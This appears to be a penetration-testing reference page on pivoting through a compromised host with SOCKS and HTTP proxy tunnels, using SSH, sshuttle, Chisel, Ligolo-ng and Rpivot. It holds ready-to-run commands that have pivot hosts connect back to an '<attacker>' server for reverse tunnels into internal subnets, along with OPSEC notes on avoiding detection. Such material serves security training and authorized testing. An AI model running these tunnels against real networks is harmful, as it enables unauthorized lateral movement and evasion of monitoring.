SOCKS and HTTP Proxy Tunnels
#Overview
SOCKS and HTTP proxy tunnels provide full network-layer access through a compromised host. A SOCKS proxy routes any TCP connection, while HTTP proxies encapsulate traffic in HTTP requests.
#SSH Dynamic Forwarding (Extended)
#SSH Config for Proxy Jumps
# ~/.ssh/config - Preconfigure proxy hosts
Host pivot1
HostName 10.10.10.10
User ubuntu
IdentityFile ~/.ssh/pivot1_key
DynamicForward 1080
Host pivot2
HostName 172.16.0.5
User admin
ProxyJump pivot1
DynamicForward 1081
BASH
#Multiple SOCKS Proxies
# Multiple -D flags for different SOCKS ports
ssh -D 1080 -D 1081 -D 1082 user@pivot
# Use specific SOCKS port with proxychains
# Edit /etc/proxychains4.conf:
# socks5 127.0.0.1 1080
BASH
#SSHuttle (Transparent Proxy)
SSHuttle creates a transparent VPN-like proxy that routes all traffic (not just SOCKS) through an SSH tunnel. No proxychains needed — all tools work natively.
# Install SSHuttle
pip3 install sshuttle
# Basic: route 172.16.0.0/12 through pivot
sshuttle -r user@pivot 172.16.0.0/12
# With DNS tunneling
sshuttle -r user@pivot 172.16.0.0/12 --dns
# Exclude specific subnets (don't route your own traffic)
sshuttle -r user@pivot 0.0.0.0/0 --exclude 10.10.0.0/16
# With SSH key
sshuttle -r user@pivot --ssh-cmd "ssh -i ~/.ssh/key" 172.16.0.0/12
# Multiple subnets
sshuttle -r user@pivot 172.16.0.0/12 192.168.0.0/16 10.0.0.0/8
# As daemon (background)
sshuttle -r user@pivot 172.16.0.0/12 --daemon --pidfile /tmp/sshuttle.pid
# Stop
kill $(cat /tmp/sshuttle.pid)
BASH
#SSHuttle vs SSH -D + proxychains
| Feature | SSHuttle | SSH -D + proxychains |
|---|---|---|
| Setup | Single command | SSH + proxychains config |
| Application support | All (transparent) | Only SOCKS-aware apps |
| DNS routing | Yes (--dns) | Manual configuration |
| Performance | Kernel-level routing | User-space proxy |
| ICMP support | No | No |
| Platform | Linux only | Linux + Windows |
#Chisel (Advanced Configuration)
#Reverse SOCKS Proxy with Authentication
# Server (attacker) - with authentication and TLS
chisel server -p 8080 --reverse --auth user:pass --tlskey /tmp/key.pem --tlscert /tmp/cert.pem
# Client (pivot) - connect with auth
chisel client --auth user:pass https://<attacker>:8080 R:socks
# Multiple reverse forwards
chisel client --auth user:pass https://<attacker>:8080 \
R:socks \
R:8080:172.16.0.10:80 \
R:3306:172.16.0.20:3306
BASH
#Chisel Server Clustering
# Start multiple chisel servers for redundancy
chisel server -p 8080 --reverse &
chisel server -p 8081 --reverse &
# Client connects to primary, falls back to secondary
chisel client https://<attacker>:8080 R:socks
BASH
#Ligolo-ng (Advanced Configuration)
#Multiple Sessions
# Proxy (attacker) - accept multiple agents
sudo proxychains4 ligolo-ng -selfcert -laddr 0.0.0.0:11601
# Agent 1 (pivot 1)
./agent -connect <attacker>:11601 -ignore-cert
# Agent 2 (pivot 2)
./agent -connect <attacker>:11601 -ignore-cert
# In Ligolo-ng prompt:
# session -> list available sessions
# session 1 -> switch to session 1
# session 2 -> switch to session 2
# ifconfig -> show tunnel interface for current session
# start -> start routing for current session
BASH
#Listener Management
# In Ligolo-ng prompt:
# listener_add --addr 0.0.0.0:8080 --tcp 172.16.0.10:80
# This creates a port forward: attacker:8080 -> pivot:80 -> 172.16.0.10:80
# listener_list
# listener_delete 0
TEXT
#Rpivot (Reverse SOCKS Proxy)
Rpivot is a Python-based reverse SOCKS proxy that works well in restricted environments where you can't upload large binaries.
# Install
git clone https://github.com/klsecservices/rpivot.git
cd rpivot
pip install -r requirements.txt
# Server (attacker) - listen for reverse connection
python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-type socks
# Client (pivot) - connect back to attacker
python client.py --server-ip <attacker> --server-port 9999
# Use the SOCKS proxy
proxychains4 nmap -sn 172.16.0.0/24
# Through NTLM proxy (corporate web proxy)
python client.py --server-ip <attacker> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --ntlm-proxy-user domain\\user --ntlm-proxy-pass password
BASH
#Rpivot vs Chisel
| Feature | Rpivot | Chisel |
|---|---|---|
| Language | Python | Go |
| Binary size | Small (script) | Larger (~8MB) |
| NTLM proxy support | Yes | No |
| Cross-platform | Python required | Single binary |
| Speed | Slower | Faster |
#OPSEC Considerations
- SSHuttle modifies the kernel routing table — detectable by host-based monitoring
- Chisel over plain HTTP is detectable by traffic analysis (use --tls)
- Rpivot creates a Python process that may stand out in process listings
- Ligolo-ng creates a TUN interface visible in
ip addrandifconfig - Multiple SOCKS connections through the same proxy create a traffic pattern that NIDS can detect
#Cross-References
- 07 - Post-Exploitation — Basic SSH -D, Chisel, Ligolo-ng setup
- Web Tunnels — When only HTTP egress is available
- SSH Port Forwarding — Single-port SSH forwarding
- Chaining Proxies — Multi-hop SOCKS chains